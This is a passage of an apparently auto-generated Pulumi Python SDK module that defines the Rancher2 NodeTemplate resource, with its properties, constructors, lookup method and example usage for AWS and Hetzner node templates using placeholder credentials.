@pulumi.getter(name="engineEnv")
def engine_env(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Engine environment for the node template (string)
"""
return pulumi.get(self, "engine_env")
@engine_env.setter
def engine_env(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "engine_env", value)
@property
@pulumi.getter(name="engineInsecureRegistries")
def engine_insecure_registries(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Insecure registry for the node template (list)
"""
return pulumi.get(self, "engine_insecure_registries")
@engine_insecure_registries.setter
def engine_insecure_registries(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "engine_insecure_registries", value)
@property
@pulumi.getter(name="engineInstallUrl")
def engine_install_url(self) -> Optional[pulumi.Input[str]]:
"""
Docker engine install URL for the node template. Available install docker versions at `https://github.com/rancher/install-docker` (string)
"""
return pulumi.get(self, "engine_install_url")
@engine_install_url.setter
def engine_install_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "engine_install_url", value)
@property
@pulumi.getter(name="engineLabel")
def engine_label(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Engine label for the node template (string)
"""
return pulumi.get(self, "engine_label")
@engine_label.setter
def engine_label(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "engine_label", value)
@property
@pulumi.getter(name="engineOpt")
def engine_opt(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Engine options for the node template (map)
"""
return pulumi.get(self, "engine_opt")
@engine_opt.setter
def engine_opt(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "engine_opt", value)
@property
@pulumi.getter(name="engineRegistryMirrors")
def engine_registry_mirrors(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Engine registry mirror for the node template (list)
"""
return pulumi.get(self, "engine_registry_mirrors")
@engine_registry_mirrors.setter
def engine_registry_mirrors(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "engine_registry_mirrors", value)
@property
@pulumi.getter(name="engineStorageDriver")
def engine_storage_driver(self) -> Optional[pulumi.Input[str]]:
"""
Engine storage driver for the node template (string)
"""
return pulumi.get(self, "engine_storage_driver")
@engine_storage_driver.setter
def engine_storage_driver(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "engine_storage_driver", value)
@property
@pulumi.getter(name="hetznerConfig")
def hetzner_config(self) -> Optional[pulumi.Input['NodeTemplateHetznerConfigArgs']]:
"""
Hetzner config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "hetzner_config")
@hetzner_config.setter
def hetzner_config(self, value: Optional[pulumi.Input['NodeTemplateHetznerConfigArgs']]):
pulumi.set(self, "hetzner_config", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Labels for Node Template object (map)
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="linodeConfig")
def linode_config(self) -> Optional[pulumi.Input['NodeTemplateLinodeConfigArgs']]:
"""
Linode config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "linode_config")
@linode_config.setter
def linode_config(self, value: Optional[pulumi.Input['NodeTemplateLinodeConfigArgs']]):
pulumi.set(self, "linode_config", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Node Template (string)
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="nodeTaints")
def node_taints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NodeTemplateNodeTaintArgs']]]]:
"""
Node taints. For Rancher v2.3.3 or above (List)
"""
return pulumi.get(self, "node_taints")
@node_taints.setter
def node_taints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NodeTemplateNodeTaintArgs']]]]):
pulumi.set(self, "node_taints", value)
@property
@pulumi.getter(name="opennebulaConfig")
def opennebula_config(self) -> Optional[pulumi.Input['NodeTemplateOpennebulaConfigArgs']]:
"""
Opennebula config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "opennebula_config")
@opennebula_config.setter
def opennebula_config(self, value: Optional[pulumi.Input['NodeTemplateOpennebulaConfigArgs']]):
pulumi.set(self, "opennebula_config", value)
@property
@pulumi.getter(name="openstackConfig")
def openstack_config(self) -> Optional[pulumi.Input['NodeTemplateOpenstackConfigArgs']]:
"""
Openstack config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "openstack_config")
@openstack_config.setter
def openstack_config(self, value: Optional[pulumi.Input['NodeTemplateOpenstackConfigArgs']]):
pulumi.set(self, "openstack_config", value)
@property
@pulumi.getter(name="useInternalIpAddress")
def use_internal_ip_address(self) -> Optional[pulumi.Input[bool]]:
"""
Engine storage driver for the node template (bool)
"""
return pulumi.get(self, "use_internal_ip_address")
@use_internal_ip_address.setter
def use_internal_ip_address(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "use_internal_ip_address", value)
@property
@pulumi.getter(name="vsphereConfig")
def vsphere_config(self) -> Optional[pulumi.Input['NodeTemplateVsphereConfigArgs']]:
"""
vSphere config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "vsphere_config")
@vsphere_config.setter
def vsphere_config(self, value: Optional[pulumi.Input['NodeTemplateVsphereConfigArgs']]):
pulumi.set(self, "vsphere_config", value)
class NodeTemplate(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
amazonec2_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateAmazonec2ConfigArgs']]] = None,
annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
auth_certificate_authority: Optional[pulumi.Input[str]] = None,
auth_key: Optional[pulumi.Input[str]] = None,
azure_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateAzureConfigArgs']]] = None,
cloud_credential_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
digitalocean_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateDigitaloceanConfigArgs']]] = None,
driver_id: Optional[pulumi.Input[str]] = None,
engine_env: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_insecure_registries: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
engine_install_url: Optional[pulumi.Input[str]] = None,
engine_label: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_opt: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_registry_mirrors: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
engine_storage_driver: Optional[pulumi.Input[str]] = None,
hetzner_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateHetznerConfigArgs']]] = None,
labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
linode_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateLinodeConfigArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
node_taints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NodeTemplateNodeTaintArgs']]]]] = None,
opennebula_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateOpennebulaConfigArgs']]] = None,
openstack_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateOpenstackConfigArgs']]] = None,
use_internal_ip_address: Optional[pulumi.Input[bool]] = None,
vsphere_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateVsphereConfigArgs']]] = None,
__props__=None):
"""
Provides a Rancher v2 Node Template resource. This can be used to create Node Template for Rancher v2 and retrieve their information.
amazonec2, azure, digitalocean, linode, opennebula, openstack, hetzner, and vsphere drivers are supported for node templates.
**Note** If you are upgrading to Rancher v2.3.3, please take a look to final section
## Example Usage
```python
import pulumi
import pulumi_rancher2 as rancher2
# Create a new rancher2 Node Template up to Rancher 2.1.x
foo = rancher2.NodeTemplate("foo",
amazonec2_config=rancher2.NodeTemplateAmazonec2ConfigArgs(
access_key="AWS_ACCESS_KEY",
ami="<AMI_ID>",
region="<REGION>",
secret_key="<AWS_SECRET_KEY>",
security_groups=["<AWS_SECURITY_GROUP>"],
subnet_id="<SUBNET_ID>",
vpc_id="<VPC_ID>",
zone="<ZONE>",
),
description="foo test")
```
```python
import pulumi
import pulumi_rancher2 as rancher2
# Create a new rancher2 Node Template from Rancher 2.2.x
foo_cloud_credential = rancher2.CloudCredential("fooCloudCredential",
description="foo test",
amazonec2_credential_config=rancher2.CloudCredentialAmazonec2CredentialConfigArgs(
access_key="<AWS_ACCESS_KEY>",
secret_key="<AWS_SECRET_KEY>",
))
foo_node_template = rancher2.NodeTemplate("fooNodeTemplate",
description="foo test",
cloud_credential_id=foo_cloud_credential.id,
amazonec2_config=rancher2.NodeTemplateAmazonec2ConfigArgs(
ami="<AMI_ID>",
region="<REGION>",
security_groups=["<AWS_SECURITY_GROUP>"],
subnet_id="<SUBNET_ID>",
vpc_id="<VPC_ID>",
zone="<ZONE>",
))
```
### Using the Hetzner Node Driver
```python
import pulumi
import pulumi_rancher2 as rancher2
# Create a new rancher2 Node Template using hetzner node_driver
hetzner_node_driver = rancher2.NodeDriver("hetznerNodeDriver",
active=True,
builtin=False,
ui_url="https://storage.googleapis.com/hcloud-rancher-v2-ui-driver/component.js",
url="https://github.com/JonasProgrammer/docker-machine-driver-hetzner/releases/download/3.0.0/docker-machine-driver-hetzner_3.0.0_linux_amd64.tar.gz",
whitelist_domains=["storage.googleapis.com"])
my_hetzner_node_template = rancher2.NodeTemplate("myHetznerNodeTemplate",
driver_id=hetzner_node_driver.id,
hetzner_config=rancher2.NodeTemplateHetznerConfigArgs(
api_token="XXXXXXXXXX",
image="ubuntu-18.04",
server_location="nbg1",
server_type="cx11",
))
```
## Import
Node Template can be imported using the Rancher Node Template ID
```sh
$ pulumi import rancher2:index/nodeTemplate:NodeTemplate foo <node_template_id>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['NodeTemplateAmazonec2ConfigArgs']] amazonec2_config: AWS config for the Node Template (list maxitems:1)
:param pulumi.Input[Mapping[str, Any]] annotations: Annotations for Node Template object (map)
:param pulumi.Input[str] auth_certificate_authority: Auth certificate authority for the Node Template (string)
:param pulumi.Input[str] auth_key: Auth key for the Node Template (string)
:param pulumi.Input[pulumi.InputType['NodeTemplateAzureConfigArgs']] azure_config: Azure config for the Node Template (list maxitems:1)
:param pulumi.Input[str] cloud_credential_id: Cloud credential ID for the Node Template. Required from Rancher v2.2.x (string)
:param pulumi.Input[str] description: Description for the Node Template (string)
:param pulumi.Input[pulumi.InputType['NodeTemplateDigitaloceanConfigArgs']] digitalocean_config: Digitalocean config for the Node Template (list maxitems:1)
:param pulumi.Input[str] driver_id: The node driver id used by the node template. It's required if the node driver isn't built in Rancher (string)
:param pulumi.Input[Mapping[str, Any]] engine_env: Engine environment for the node template (string)
:param pulumi.Input[Sequence[pulumi.Input[str]]] engine_insecure_registries: Insecure registry for the node template (list)
:param pulumi.Input[str] engine_install_url: Docker engine install URL for the node template. Available install docker versions at `https://github.com/rancher/install-docker` (string)
:param pulumi.Input[Mapping[str, Any]] engine_label: Engine label for the node template (string)
:param pulumi.Input[Mapping[str, Any]] engine_opt: Engine options for the node template (map)
:param pulumi.Input[Sequence[pulumi.Input[str]]] engine_registry_mirrors: Engine registry mirror for the node template (list)
:param pulumi.Input[str] engine_storage_driver: Engine storage driver for the node template (string)
:param pulumi.Input[pulumi.InputType['NodeTemplateHetznerConfigArgs']] hetzner_config: Hetzner config for the Node Template (list maxitems:1)
:param pulumi.Input[Mapping[str, Any]] labels: Labels for Node Template object (map)
:param pulumi.Input[pulumi.InputType['NodeTemplateLinodeConfigArgs']] linode_config: Linode config for the Node Template (list maxitems:1)
:param pulumi.Input[str] name: The name of the Node Template (string)
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NodeTemplateNodeTaintArgs']]]] node_taints: Node taints. For Rancher v2.3.3 or above (List)
:param pulumi.Input[pulumi.InputType['NodeTemplateOpennebulaConfigArgs']] opennebula_config: Opennebula config for the Node Template (list maxitems:1)
:param pulumi.Input[pulumi.InputType['NodeTemplateOpenstackConfigArgs']] openstack_config: Openstack config for the Node Template (list maxitems:1)
:param pulumi.Input[bool] use_internal_ip_address: Engine storage driver for the node template (bool)
:param pulumi.Input[pulumi.InputType['NodeTemplateVsphereConfigArgs']] vsphere_config: vSphere config for the Node Template (list maxitems:1)
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[NodeTemplateArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Rancher v2 Node Template resource. This can be used to create Node Template for Rancher v2 and retrieve their information.
amazonec2, azure, digitalocean, linode, opennebula, openstack, hetzner, and vsphere drivers are supported for node templates.
**Note** If you are upgrading to Rancher v2.3.3, please take a look to final section
## Example Usage
```python
import pulumi
import pulumi_rancher2 as rancher2
# Create a new rancher2 Node Template up to Rancher 2.1.x
foo = rancher2.NodeTemplate("foo",
amazonec2_config=rancher2.NodeTemplateAmazonec2ConfigArgs(
access_key="AWS_ACCESS_KEY",
ami="<AMI_ID>",
region="<REGION>",
secret_key="<AWS_SECRET_KEY>",
security_groups=["<AWS_SECURITY_GROUP>"],
subnet_id="<SUBNET_ID>",
vpc_id="<VPC_ID>",
zone="<ZONE>",
),
description="foo test")
```
```python
import pulumi
import pulumi_rancher2 as rancher2
# Create a new rancher2 Node Template from Rancher 2.2.x
foo_cloud_credential = rancher2.CloudCredential("fooCloudCredential",
description="foo test",
amazonec2_credential_config=rancher2.CloudCredentialAmazonec2CredentialConfigArgs(
access_key="<AWS_ACCESS_KEY>",
secret_key="<AWS_SECRET_KEY>",
))
foo_node_template = rancher2.NodeTemplate("fooNodeTemplate",
description="foo test",
cloud_credential_id=foo_cloud_credential.id,
amazonec2_config=rancher2.NodeTemplateAmazonec2ConfigArgs(
ami="<AMI_ID>",
region="<REGION>",
security_groups=["<AWS_SECURITY_GROUP>"],
subnet_id="<SUBNET_ID>",
vpc_id="<VPC_ID>",
zone="<ZONE>",
))
```
### Using the Hetzner Node Driver
```python
import pulumi
import pulumi_rancher2 as rancher2
# Create a new rancher2 Node Template using hetzner node_driver
hetzner_node_driver = rancher2.NodeDriver("hetznerNodeDriver",
active=True,
builtin=False,
ui_url="https://storage.googleapis.com/hcloud-rancher-v2-ui-driver/component.js",
url="https://github.com/JonasProgrammer/docker-machine-driver-hetzner/releases/download/3.0.0/docker-machine-driver-hetzner_3.0.0_linux_amd64.tar.gz",
whitelist_domains=["storage.googleapis.com"])
my_hetzner_node_template = rancher2.NodeTemplate("myHetznerNodeTemplate",
driver_id=hetzner_node_driver.id,
hetzner_config=rancher2.NodeTemplateHetznerConfigArgs(
api_token="XXXXXXXXXX",
image="ubuntu-18.04",
server_location="nbg1",
server_type="cx11",
))
```
## Import
Node Template can be imported using the Rancher Node Template ID
```sh
$ pulumi import rancher2:index/nodeTemplate:NodeTemplate foo <node_template_id>
```
:param str resource_name: The name of the resource.
:param NodeTemplateArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(NodeTemplateArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
amazonec2_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateAmazonec2ConfigArgs']]] = None,
annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
auth_certificate_authority: Optional[pulumi.Input[str]] = None,
auth_key: Optional[pulumi.Input[str]] = None,
azure_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateAzureConfigArgs']]] = None,
cloud_credential_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
digitalocean_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateDigitaloceanConfigArgs']]] = None,
driver_id: Optional[pulumi.Input[str]] = None,
engine_env: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_insecure_registries: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
engine_install_url: Optional[pulumi.Input[str]] = None,
engine_label: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_opt: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_registry_mirrors: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
engine_storage_driver: Optional[pulumi.Input[str]] = None,
hetzner_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateHetznerConfigArgs']]] = None,
labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
linode_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateLinodeConfigArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
node_taints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NodeTemplateNodeTaintArgs']]]]] = None,
opennebula_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateOpennebulaConfigArgs']]] = None,
openstack_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateOpenstackConfigArgs']]] = None,
use_internal_ip_address: Optional[pulumi.Input[bool]] = None,
vsphere_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateVsphereConfigArgs']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = NodeTemplateArgs.__new__(NodeTemplateArgs)
__props__.__dict__["amazonec2_config"] = amazonec2_config
__props__.__dict__["annotations"] = annotations
__props__.__dict__["auth_certificate_authority"] = auth_certificate_authority
__props__.__dict__["auth_key"] = auth_key
__props__.__dict__["azure_config"] = azure_config
__props__.__dict__["cloud_credential_id"] = cloud_credential_id
__props__.__dict__["description"] = description
__props__.__dict__["digitalocean_config"] = digitalocean_config
__props__.__dict__["driver_id"] = driver_id
__props__.__dict__["engine_env"] = engine_env
__props__.__dict__["engine_insecure_registries"] = engine_insecure_registries
__props__.__dict__["engine_install_url"] = engine_install_url
__props__.__dict__["engine_label"] = engine_label
__props__.__dict__["engine_opt"] = engine_opt
__props__.__dict__["engine_registry_mirrors"] = engine_registry_mirrors
__props__.__dict__["engine_storage_driver"] = engine_storage_driver
__props__.__dict__["hetzner_config"] = hetzner_config
__props__.__dict__["labels"] = labels
__props__.__dict__["linode_config"] = linode_config
__props__.__dict__["name"] = name
__props__.__dict__["node_taints"] = node_taints
__props__.__dict__["opennebula_config"] = opennebula_config
__props__.__dict__["openstack_config"] = openstack_config
__props__.__dict__["use_internal_ip_address"] = use_internal_ip_address
__props__.__dict__["vsphere_config"] = vsphere_config
__props__.__dict__["driver"] = None
super(NodeTemplate, __self__).__init__(
'rancher2:index/nodeTemplate:NodeTemplate',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
amazonec2_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateAmazonec2ConfigArgs']]] = None,
annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
auth_certificate_authority: Optional[pulumi.Input[str]] = None,
auth_key: Optional[pulumi.Input[str]] = None,
azure_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateAzureConfigArgs']]] = None,
cloud_credential_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
digitalocean_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateDigitaloceanConfigArgs']]] = None,
driver: Optional[pulumi.Input[str]] = None,
driver_id: Optional[pulumi.Input[str]] = None,
engine_env: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_insecure_registries: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
engine_install_url: Optional[pulumi.Input[str]] = None,
engine_label: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_opt: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_registry_mirrors: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
engine_storage_driver: Optional[pulumi.Input[str]] = None,
hetzner_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateHetznerConfigArgs']]] = None,
labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
linode_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateLinodeConfigArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
node_taints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NodeTemplateNodeTaintArgs']]]]] = None,
opennebula_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateOpennebulaConfigArgs']]] = None,
openstack_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateOpenstackConfigArgs']]] = None,
use_internal_ip_address: Optional[pulumi.Input[bool]] = None,
vsphere_config: Optional[pulumi.Input[pulumi.InputType['NodeTemplateVsphereConfigArgs']]] = None) -> 'NodeTemplate':
"""
Get an existing NodeTemplate resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['NodeTemplateAmazonec2ConfigArgs']] amazonec2_config: AWS config for the Node Template (list maxitems:1)
:param pulumi.Input[Mapping[str, Any]] annotations: Annotations for Node Template object (map)
:param pulumi.Input[str] auth_certificate_authority: Auth certificate authority for the Node Template (string)
:param pulumi.Input[str] auth_key: Auth key for the Node Template (string)
:param pulumi.Input[pulumi.InputType['NodeTemplateAzureConfigArgs']] azure_config: Azure config for the Node Template (list maxitems:1)
:param pulumi.Input[str] cloud_credential_id: Cloud credential ID for the Node Template. Required from Rancher v2.2.x (string)
:param pulumi.Input[str] description: Description for the Node Template (string)
:param pulumi.Input[pulumi.InputType['NodeTemplateDigitaloceanConfigArgs']] digitalocean_config: Digitalocean config for the Node Template (list maxitems:1)
:param pulumi.Input[str] driver: (Computed) The driver of the node template (string)
:param pulumi.Input[str] driver_id: The node driver id used by the node template. It's required if the node driver isn't built in Rancher (string)
:param pulumi.Input[Mapping[str, Any]] engine_env: Engine environment for the node template (string)
:param pulumi.Input[Sequence[pulumi.Input[str]]] engine_insecure_registries: Insecure registry for the node template (list)
:param pulumi.Input[str] engine_install_url: Docker engine install URL for the node template. Available install docker versions at `https://github.com/rancher/install-docker` (string)
:param pulumi.Input[Mapping[str, Any]] engine_label: Engine label for the node template (string)
:param pulumi.Input[Mapping[str, Any]] engine_opt: Engine options for the node template (map)
:param pulumi.Input[Sequence[pulumi.Input[str]]] engine_registry_mirrors: Engine registry mirror for the node template (list)
:param pulumi.Input[str] engine_storage_driver: Engine storage driver for the node template (string)
:param pulumi.Input[pulumi.InputType['NodeTemplateHetznerConfigArgs']] hetzner_config: Hetzner config for the Node Template (list maxitems:1)
:param pulumi.Input[Mapping[str, Any]] labels: Labels for Node Template object (map)
:param pulumi.Input[pulumi.InputType['NodeTemplateLinodeConfigArgs']] linode_config: Linode config for the Node Template (list maxitems:1)
:param pulumi.Input[str] name: The name of the Node Template (string)
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NodeTemplateNodeTaintArgs']]]] node_taints: Node taints. For Rancher v2.3.3 or above (List)
:param pulumi.Input[pulumi.InputType['NodeTemplateOpennebulaConfigArgs']] opennebula_config: Opennebula config for the Node Template (list maxitems:1)
:param pulumi.Input[pulumi.InputType['NodeTemplateOpenstackConfigArgs']] openstack_config: Openstack config for the Node Template (list maxitems:1)
:param pulumi.Input[bool] use_internal_ip_address: Engine storage driver for the node template (bool)
:param pulumi.Input[pulumi.InputType['NodeTemplateVsphereConfigArgs']] vsphere_config: vSphere config for the Node Template (list maxitems:1)
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _NodeTemplateState.__new__(_NodeTemplateState)
__props__.__dict__["amazonec2_config"] = amazonec2_config
__props__.__dict__["annotations"] = annotations
__props__.__dict__["auth_certificate_authority"] = auth_certificate_authority
__props__.__dict__["auth_key"] = auth_key
__props__.__dict__["azure_config"] = azure_config
__props__.__dict__["cloud_credential_id"] = cloud_credential_id
__props__.__dict__["description"] = description
__props__.__dict__["digitalocean_config"] = digitalocean_config
__props__.__dict__["driver"] = driver
__props__.__dict__["driver_id"] = driver_id
__props__.__dict__["engine_env"] = engine_env
__props__.__dict__["engine_insecure_registries"] = engine_insecure_registries
__props__.__dict__["engine_install_url"] = engine_install_url
__props__.__dict__["engine_label"] = engine_label
__props__.__dict__["engine_opt"] = engine_opt
__props__.__dict__["engine_registry_mirrors"] = engine_registry_mirrors
__props__.__dict__["engine_storage_driver"] = engine_storage_driver
__props__.__dict__["hetzner_config"] = hetzner_config
__props__.__dict__["labels"] = labels
__props__.__dict__["linode_config"] = linode_config
__props__.__dict__["name"] = name
__props__.__dict__["node_taints"] = node_taints
__props__.__dict__["opennebula_config"] = opennebula_config
__props__.__dict__["openstack_config"] = openstack_config
__props__.__dict__["use_internal_ip_address"] = use_internal_ip_address
__props__.__dict__["vsphere_config"] = vsphere_config
return NodeTemplate(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="amazonec2Config")
def amazonec2_config(self) -> pulumi.Output[Optional['outputs.NodeTemplateAmazonec2Config']]:
"""
AWS config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "amazonec2_config")
@property
@pulumi.getter
def annotations(self) -> pulumi.Output[Mapping[str, Any]]:
"""
Annotations for Node Template object (map)
"""
return pulumi.get(self, "annotations")
@property
@pulumi.getter(name="authCertificateAuthority")
def auth_certificate_authority(self) -> pulumi.Output[Optional[str]]:
"""
Auth certificate authority for the Node Template (string)
"""
return pulumi.get(self, "auth_certificate_authority")
@property
@pulumi.getter(name="authKey")
def auth_key(self) -> pulumi.Output[Optional[str]]:
"""
Auth key for the Node Template (string)
"""
return pulumi.get(self, "auth_key")
@property
@pulumi.getter(name="azureConfig")
def azure_config(self) -> pulumi.Output[Optional['outputs.NodeTemplateAzureConfig']]:
"""
Azure config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "azure_config")
@property
@pulumi.getter(name="cloudCredentialId")
def cloud_credential_id(self) -> pulumi.Output[Optional[str]]:
"""
Cloud credential ID for the Node Template. Required from Rancher v2.2.x (string)
"""
return pulumi.get(self, "cloud_credential_id")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Description for the Node Template (string)
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="digitaloceanConfig")
def digitalocean_config(self) -> pulumi.Output[Optional['outputs.NodeTemplateDigitaloceanConfig']]:
"""
Digitalocean config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "digitalocean_config")
@property
@pulumi.getter
def driver(self) -> pulumi.Output[str]:
"""
(Computed) The driver of the node template (string)
"""
return pulumi.get(self, "driver")
@property
@pulumi.getter(name="driverId")
def driver_id(self) -> pulumi.Output[str]:
"""
The node driver id used by the node template. It's required if the node driver isn't built in Rancher (string)
"""
return pulumi.get(self, "driver_id")
@property
@pulumi.getter(name="engineEnv")
def engine_env(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
Engine environment for the node template (string)
"""
return pulumi.get(self, "engine_env")
@property
@pulumi.getter(name="engineInsecureRegistries")
def engine_insecure_registries(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Insecure registry for the node template (list)
"""
return pulumi.get(self, "engine_insecure_registries")
@property
@pulumi.getter(name="engineInstallUrl")
def engine_install_url(self) -> pulumi.Output[str]:
"""
Docker engine install URL for the node template. Available install docker versions at `https://github.com/rancher/install-docker` (string)
"""
return pulumi.get(self, "engine_install_url")
@property
@pulumi.getter(name="engineLabel")
def engine_label(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
Engine label for the node template (string)
"""
return pulumi.get(self, "engine_label")
@property
@pulumi.getter(name="engineOpt")
def engine_opt(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
Engine options for the node template (map)
"""
return pulumi.get(self, "engine_opt")
@property
@pulumi.getter(name="engineRegistryMirrors")
def engine_registry_mirrors(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Engine registry mirror for the node template (list)
"""
return pulumi.get(self, "engine_registry_mirrors")
@property
@pulumi.getter(name="engineStorageDriver")
def engine_storage_driver(self) -> pulumi.Output[Optional[str]]:
"""
Engine storage driver for the node template (string)
"""
return pulumi.get(self, "engine_storage_driver")
@property
@pulumi.getter(name="hetznerConfig")
def hetzner_config(self) -> pulumi.Output[Optional['outputs.NodeTemplateHetznerConfig']]:
"""
Hetzner config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "hetzner_config")
@property
@pulumi.getter
def labels(self) -> pulumi.Output[Mapping[str, Any]]:
"""
Labels for Node Template object (map)
"""
return pulumi.get(self, "labels")
@property
@pulumi.getter(name="linodeConfig")
def linode_config(self) -> pulumi.Output[Optional['outputs.NodeTemplateLinodeConfig']]:
"""
Linode config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "linode_config")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the Node Template (string)
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="nodeTaints")
